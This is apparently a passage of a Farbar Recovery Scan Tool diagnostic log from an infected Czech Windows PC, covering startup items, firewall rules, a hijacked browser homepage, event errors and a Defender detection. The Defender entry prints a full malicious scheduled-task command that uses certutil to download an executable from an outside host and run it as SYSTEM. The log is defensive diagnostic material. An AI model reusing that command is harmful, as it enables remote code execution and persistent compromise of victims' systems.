Doplněk multimediálního modulu pro aplikaci Fotografie -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x86__8wekyb3d8bbwe [2020-04-27] (Microsoft Corporation)
Instagram -> C:\Program Files\WindowsApps\Facebook.InstagramBeta_42.0.2.0_neutral__8xx8rvfyw5nnt [2020-05-12] (Instagram)
Media Player Go -> C:\Program Files\WindowsApps\38806TusharKoshti.MediaPlayerGo_4.1.0.0_x86__8xyfwj0nb922c [2020-09-06] (Tushar Koshti)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-11-05] (Microsoft Corporation) [MS Ad]
Microsoft Mahjong -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMahjong_3.11.6020.0_x86__8wekyb3d8bbwe [2020-06-09] (Microsoft Studios) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x86__8wekyb3d8bbwe [2020-09-06] (Microsoft Studios) [MS Ad]
UnRar Metro -> C:\Program Files\WindowsApps\1253QUANTUMVM.UNRARMETRO_14.5.0.0_x86__ckbnxvahp5f44 [2020-06-12] (QuantumVM)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{E7629152-0A34-4487-B787-5D1144304455}\localserver32 -> no filepath
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [ReflectShellExt] -> {DEBB9B79-B3DD-47F4-9E5C-EA6975BAB611} => C:\Program Files\Macrium\Reflect\RContextMenu.dll [2019-09-20] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-09] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDriveLite] -> {C06369D6-E77D-4626-9656-1256312BD576} => C:\Program Files\DAEMON Tools Lite\dtshl32.dll [2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [ReflectShellExt] -> {DEBB9B79-B3DD-47F4-9E5C-EA6975BAB611} => C:\Program Files\Macrium\Reflect\RContextMenu.dll [2019-09-20] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
ContextMenuHandlers3: [DaemonShellExtImageLite] -> {1D1B5D7B-0FC9-452E-902C-12BACD4FBC20} => C:\Program Files\DAEMON Tools Lite\dtshl32.dll [2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\atiacmxx.dll [2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-09] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [VIDC.FPS1] => C:\WINDOWS\system32\frapsvid.dll [94208 2019-08-30] (Beepa P/L) [File not signed]
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=3&aff_sub2=WGcGZy4UcmYtFXMUWmcHZkRjAEcKNQITUDYAHFExDglaZAMcRGfipJgAAAGhXNyUie&click_id=f306cd3d4dae7747931f684cc695e9d8357f3ee3
ShortcutWithArgument: C:\Users\42072\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=3&aff_sub2=WGcGZy4UcmYtFXMUWmcHZkRjAEcKNQITUDYAHFExDglaZAMcRGfipJgAAAGhXNyUie&click_id=f306cd3d4dae7747931f684cc695e9d8357f3ee3
==================== Loaded Modules (Whitelisted) =============
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\42072:.repos [616623]
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
SearchScopes: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002 -> {993F5746-4C15-42BC-99C1-064A1764271B} URL = hxxps://securesearch.org?q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_261\bin\ssv.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_261\bin\jp2ssv.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2019-03-19 04:43 - 2020-09-12 18:14 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files\ATI Technologies\ATI.ACE\Core-Static
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\42072\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\103122316 (2).jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run: => "seznam-listicka-distribuce"
HKLM\...\StartupApproved\Run: => "Launch LCore"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "rfxgnkvq"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "CloudNet"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Web Companion"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Mobigame Playstore"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{84300298-B7CB-433F-910C-B145F679ED07}C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe] => (Block) C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe
FirewallRules: [TCP Query User{019068A6-6063-42C6-856F-7D4F25FD45F9}C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe] => (Block) C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe
FirewallRules: [UDP Query User{8D828ACF-4AEA-44C5-A1F6-B4490594C84C}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [TCP Query User{5FE5D572-B26D-4CAE-AC2E-D12DB7450D50}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [{562DE85C-29FE-45F0-AEF0-B6B7F1FA157C}] => (Allow) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.EXE (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{B25BFF2E-534B-4514-B181-D007490F890E}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{320FCA28-90D8-46D0-A192-3787C2D30DA8}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FD11177B-E329-4F0A-AB7C-A7902F91FD7D}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DB43DC0B-5959-4385-8DA3-184F468ABCBD}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{64E88E64-8F50-4D8E-AE6C-A49D73EE61AC}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{00A8BACB-445A-464B-9377-5E105021126D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{2E007B32-DF29-4372-BAD7-4AF580BCCD5E}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe
FirewallRules: [TCP Query User{0B9FD880-9293-4C01-912A-9425048B8CA0}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe
FirewallRules: [{A3C4A266-B549-4CDD-9FD9-8CBB97C57BF0}] => (Allow) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [{3EAB28E6-A364-4882-8481-895A574BF274}] => (Allow) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [UDP Query User{EAB50D73-12CA-4F3B-87F3-554786A108B0}C:\program files\duke nukem - manhattan project\prism3d.exe] => (Block) C:\program files\duke nukem - manhattan project\prism3d.exe () [File not signed]
FirewallRules: [TCP Query User{5DBABCD5-4461-4ADE-B726-1526E5409DA3}C:\program files\duke nukem - manhattan project\prism3d.exe] => (Block) C:\program files\duke nukem - manhattan project\prism3d.exe () [File not signed]
FirewallRules: [UDP Query User{58A80BB9-3D27-47F4-AF59-9C11F11B08C1}C:\program files\valve\half-life\hl.exe] => (Block) C:\program files\valve\half-life\hl.exe => No File
FirewallRules: [TCP Query User{67D1C637-5380-48E9-86BE-42E95B7CA25E}C:\program files\valve\half-life\hl.exe] => (Block) C:\program files\valve\half-life\hl.exe => No File
FirewallRules: [UDP Query User{15D6B20B-C526-4084-8018-D2BDB13DC0A7}C:\users\42072\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\42072\appdata\roaming\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{71C01058-FA98-4143-BD85-58F8754636AD}C:\users\42072\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\42072\appdata\roaming\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{D37B3EDE-1653-4473-9978-72B09F481D20}C:\users\42072\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\42072\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [TCP Query User{7A8ED71F-1BD3-4647-B441-FDBE38F625C8}C:\users\42072\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\42072\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{551B3597-06A3-471D-9767-EFE87BC8B93C}C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe] => (Block) C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe
FirewallRules: [TCP Query User{F32A8597-1895-4920-BEBF-8B41E9DC6198}C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe] => (Block) C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe
FirewallRules: [{C04E4B27-1BB9-4D05-B483-6B9D3B7A6E43}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{6508FEBA-543A-49C7-8328-EB56538D3FDF}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E4093EED-CD4A-4AC1-B72D-97A4BEF6A8D4}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{6F6B4D3D-DC59-4970-A54A-417118EFBC88}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{B1B1EA4E-71ED-4AA2-A771-6C1B62B2246F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D2097B25-660C-449A-9396-AF97B8F5BBD1}] => (Allow) C:\Program Files\MobiGame\player\mobiplayer.exe (Game Player) [File not signed]
FirewallRules: [{F3CDFAC5-A975-48F4-9DAB-369F7F2E4853}] => (Allow) C:\Program Files\MobiGame\vbox\vboxheadless.exe (Iron Entertainment Inc. -> Oracle Corporation)
FirewallRules: [{93C34D1D-8364-41F3-844F-1694693AB6AF}] => (Allow) C:\Users\42072\AppData\Roaming\16f618eaf6a0\16f618eaf6a0.exe () [File not signed]
FirewallRules: [{96DC6731-E2CF-4F11-BC78-0A40F04761A0}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]
FirewallRules: [{103F7BC9-F0D2-47F2-AE12-488E8CCB3AE5}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{E51FC64F-7EDE-49D5-A7D8-3BAEFD4D43A5}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{2E0F18A4-8866-418B-A129-0E740AFCB831}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{A1A1877F-2977-4C42-BC94-5733B7BC5052}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{C57B14A1-38E9-4505-B515-CF973F43D220}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{7A5BBB51-4EC6-4223-9825-D742308E06AC}] => (Allow) C:\Program Files\Steam\steamapps\common\SMITE\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{17AB0CF4-6BF5-4355-855D-FD1B1B3F4558}] => (Allow) C:\Program Files\Steam\steamapps\common\SMITE\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [TCP Query User{B77DDFF5-FD77-4EDA-997E-E38211DFD8B7}C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [UDP Query User{42D3A007-3F32-4A37-BFAE-2BEA8902C5D4}C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [{32366988-A515-41D3-B0D4-41DED8B526DC}] => (Allow) C:\Program Files\Steam\steamapps\common\smite pt\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{EEEA3F19-1A43-4849-9875-7F01013DC70A}] => (Allow) C:\Program Files\Steam\steamapps\common\smite pt\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [TCP Query User{D44B9937-30AF-4D9B-B4E1-A31DA800E4C4}C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [UDP Query User{0BBCD1EB-1959-44E7-AEF1-C028B8F6D5DE}C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
==================== Restore Points =========================
03-09-2020 09:10:42 Instalační služba modulů systému Windows
==================== Faulty Device Manager Devices ============
Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Standardní klávesnice PS/2
Description: Standardní klávesnice PS/2
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standardní klávesnice)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Event log errors: ========================
Application errors:
==================
Error: (10/20/2020 09:17:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: Informace služby Stínová kopie svazku: Server COM s identifikátorem CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} a názvem CEventSystem nelze spustit. [0x8007045b, Probíhá vypnutí systému.
]
Error: (10/20/2020 09:15:38 PM) (Source: ESENT) (EventID: 447) (User: )
Description: svchost (6664,D,29) SRUJet: A bad page link (error -338) has been detected in a B-Tree (ObjectId: 21, PgnoRoot: 95) of database C:\WINDOWS\system32\SRU\SRUDB.dat (671 => 3078, 21).
Tag: BtDownClinesLowEmpty
Fatal: 1
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 65536 (0x0000000000010000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 32768 (0x0000000000008000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 16384 (0x0000000000004000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
System errors:
=============
Error: (10/20/2020 10:10:00 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:09:19 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{9E175B6D-F52A-11D8-B9A5-505054503030}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby VSS s argumenty Není k dispozici za účelem spuštění serveru:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby VSS s argumenty Není k dispozici za účelem spuštění serveru:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby VSS s argumenty Není k dispozici za účelem spuštění serveru:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:50 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:08:35 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Windows Defender:
===================================
Date: 2020-10-20 21:18:45.1140000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
